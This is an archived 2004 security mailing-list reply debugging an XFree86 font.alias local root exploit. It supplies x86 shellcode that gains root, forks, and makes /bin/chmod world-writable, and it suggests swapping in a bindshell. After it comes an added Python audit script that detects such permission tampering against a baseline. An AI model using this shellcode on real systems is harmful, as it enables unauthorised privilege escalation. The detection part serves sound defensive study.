Vulnerability Development mailing list archives
Re: XFree86 font.alias exploit hangup....
From: lazy () server gwsh gda pl
Date: Fri, 27 Feb 2004 13:41:03 +0100
On Sun, Feb 22, 2004 at 10:51:18AM -0000, Dev wrote:
My problem is that once I launch the exploit the X display appears momentarily & the keyboard locks up, so now I can only access the box from the network & on a different shell. Offsets etc. are all fine & an strace yields the following log, which does indicate that the exploit was successful & execve'd /bin//sh. But I am confused about the last few lines of the strace log. Please tell me whether my root shell has exited because of some error in the last few calls?
It looks like X closes STDIN, or it's unavailable because the text console is disabled, so you can't directly use execve. The text console is broken because X is interrupted during startup. Try this shellcode: it chmods 777 /bin/chmod. You can change the code below dzic: to start a bindshell, or try to exec /bin/sh with a delay (to let the sighandler do its job); maybe the sighandler will make STDIN/STDOUT useful again. The trick is to force SIGSEGV on X to call its cleanup handlers.

-----scode.s----
start:
//setuid(0)
xor %eax,%eax
xor %ebx,%ebx
mov $0x17,%al
int $0x80
//fork
xor %eax,%eax
movb $0x2,%al
int $0x80
test %eax,%eax
jz dzic
//the trick ;)
mov $0x44444444,%ebx
call %ebx
dzic:
//chmod(/bin/chmod,777)
xor %edx,%edx
xor %eax,%eax
mov $0xfff,%dx
push %edx
push $0x646f6d68
push $0x632f2f6e
push $0x69622f2f
mov %esp,%ebx
mov $0xf,%al
int $0x80
//exit
mov $0x1,%al
int $0x80
-------

--
Lazy
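The artifact the payload above leaves behind is a world-writable /bin/chmod. The following is an added example, not code from this thread: a small audit that compares observed permission bits of system binaries against an expected baseline and flags world-writable files, unexpected setuid bits and any deviation. The baseline entries, the sample observation and the assumed XFree86 server path are constructed for the example; on a real host the baseline would come from a package manifest or a known-good snapshot.

```python
"""Audit system binaries for permission tampering (added example)."""
import os
import stat

# Constructed baseline: path -> expected permission bits (stat.S_IMODE form).
# The XFree86 path and its setuid-root mode are assumptions for the example.
BASELINE = {
    "/bin/chmod": 0o755,
    "/bin/sh": 0o755,
    "/bin/ls": 0o755,
    "/usr/X11R6/bin/XFree86": 0o4755,
}


def audit(observed, baseline=BASELINE):
    """Return a list of (path, finding) strings for every deviation.

    `observed` maps path -> permission bits (as stat.S_IMODE returns them).
    A world-writable file is always reported, whatever the baseline says,
    because that is exactly what chmod(..., 0777) on /bin/chmod produces.
    """
    findings = []
    for path, mode in sorted(observed.items()):
        if mode & stat.S_IWOTH:
            findings.append((path, "world-writable (mode %o)" % mode))
        expected = baseline.get(path)
        if expected is None:
            findings.append((path, "not in baseline"))
        elif mode != expected:
            if (mode & stat.S_ISUID) and not (expected & stat.S_ISUID):
                findings.append((path, "unexpected setuid bit"))
            findings.append((path, "mode %o differs from baseline %o" % (mode, expected)))
    return findings


def observe(paths):
    """Collect real permission bits with lstat for a live check (skips missing files)."""
    result = {}
    for p in paths:
        try:
            result[p] = stat.S_IMODE(os.lstat(p).st_mode)
        except OSError:
            pass
    return result


if __name__ == "__main__":
    # Constructed observation: the state after chmod(/bin/chmod, 0777) has run.
    sample = {"/bin/chmod": 0o777, "/bin/sh": 0o755, "/bin/ls": 0o755}
    for path, finding in audit(sample):
        print("%s: %s" % (path, finding))
```

Running `audit(observe(BASELINE))` performs the same comparison against the live filesystem.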